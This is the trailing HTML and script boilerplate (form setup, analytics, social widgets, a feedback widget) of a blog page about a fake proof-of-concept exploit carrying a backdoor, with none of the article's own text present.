    <script data-hs-allowed="true">
        var options = {
            portalId: '2617658',
            formId: '0492e7b1-c029-4110-8042-598f482d9802',
            formInstanceId: '8398',
            
            pageId: '124199424638',
            
            region: 'na1',
            
            
            
            
            pageName: "New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware",
            
            
            
            inlineMessage: "Thanks for submitting the form.",
            
            
            rawInlineMessage: "Thanks for submitting the form.",
            
            
            hsFormKey: "76e03b9876f30706ac054bb472f963c5",
            
            
            css: '',
            target: '#hs_form_target_form_255149992',
            
            
            
            
            
            
            
            contentType: "blog-post",
            
            
            
            formsBaseUrl: '/_hcms/forms/',
            
            
            
            formData: {
                cssClass: 'hs-form stacked hs-custom-form'
            }
        };

        options.getExtraMetaDataBeforeSubmit = function() {
            var metadata = {};
            

            if (hbspt.targetedContentMetadata) {
                var count = hbspt.targetedContentMetadata.length;
                var targetedContentData = [];
                for (var i = 0; i < count; i++) {
                    var tc = hbspt.targetedContentMetadata[i];
                     if ( tc.length !== 3) {
                        continue;
                     }
                     targetedContentData.push({
                        definitionId: tc[0],
                        criterionId: tc[1],
                        smartTypeId: tc[2]
                     });
                }
                metadata["targetedContentMetadata"] = JSON.stringify(targetedContentData);
            }

            return metadata;
        };

        hbspt.forms.create(options);
    </script>


<!-- Start of HubSpot Analytics Code -->
<script type="text/javascript">
var _hsq = _hsq || [];
_hsq.push(["setContentType", "blog-post"]);
_hsq.push(["setCanonicalUrl", "https:\/\/www.uptycs.com\/blog\/threat-research-report-team\/new-poc-exploit-backdoor-malware"]);
_hsq.push(["setPageId", "124199424638"]);
_hsq.push(["setContentMetadata", {
    "contentPageId": 124199424638,
    "legacyPageId": "124199424638",
    "contentFolderId": null,
    "contentGroupId": 174984884320,
    "abTestId": null,
    "languageVariantId": 124199424638,
    "languageCode": "en",
    
    
}]);
</script>

<script type="text/javascript" id="hs-script-loader" async defer src="/hs/scriptloader/2617658.js"></script>
<!-- End of HubSpot Analytics Code -->


<script type="text/javascript">
var hsVars = {
    render_id: "cbf520b7-9873-4431-88aa-eb786119f3d0",
    ticks: 1733491119168,
    page_id: 124199424638,
    
    content_group_id: 174984884320,
    portal_id: 2617658,
    app_hs_base_url: "https://app.hubspot.com",
    cp_hs_base_url: "https://cp.hubspot.com",
    language: "en",
    analytics_page_type: "blog-post",
    scp_content_type: "",
    analytics_page_id: "124199424638",
    category_id: 3,
    folder_id: 0,
    is_hubspot_user: false
}
</script>


<script defer src="/hs/hsstatic/HubspotToolsMenu/static-1.354/js/index.js"></script>

      <noscript>
        <img src="https://ws.zoominfo.com/pixel/6127ecc2d037650015c31617" width="1" height="1" style="display: none;">
      </noscript>




<div id="fb-root"></div>
  <script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_GB/sdk.js#xfbml=1&version=v3.0";
  fjs.parentNode.insertBefore(js, fjs);
 }(document, 'script', 'facebook-jssdk'));</script> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
 



    <!-- Lozad.js from CDN -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/js-polyfills/0.1.42/polyfill.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>
    <script>
      jQuery(document).ready(function() {

        const observer = lozad('.lozad', {
          rootMargin: '0%',
          loaded: function (el) {
            el.classList.add("is-loaded");
            el.classList.add("fades");
          }
        });
        observer.observe();

      });
    </script>

    <style>
      .fades {
        animation-name: fade;
        animation-duration: 2s;
      }
      @keyframes fade {
        from {
          opacity: 0;
        }
        to {
          opacity: 1;
        }
      }
    </style>
    <!-- Lozad.js from CDN -->

    <script>
      window.Userback = window.Userback || {};
      Userback.access_token = 'P-5RVE7RcuXUu9psHGXBbJ3Rezx';
      // identify your logged-in users (optional)
      Userback.user_data = {
        id: "123456", // example data
        info: {
          name: "someone", // example data
          email: "someone@example.com" // example data
        }
      };
      (function(d) {
        var s = d.createElement('script');s.async = true;
        s.src = 'https://static.userback.io/widget/v1.js';
        (d.head || d.body).appendChild(s);
      })(document);
    </script>

  
</body></html>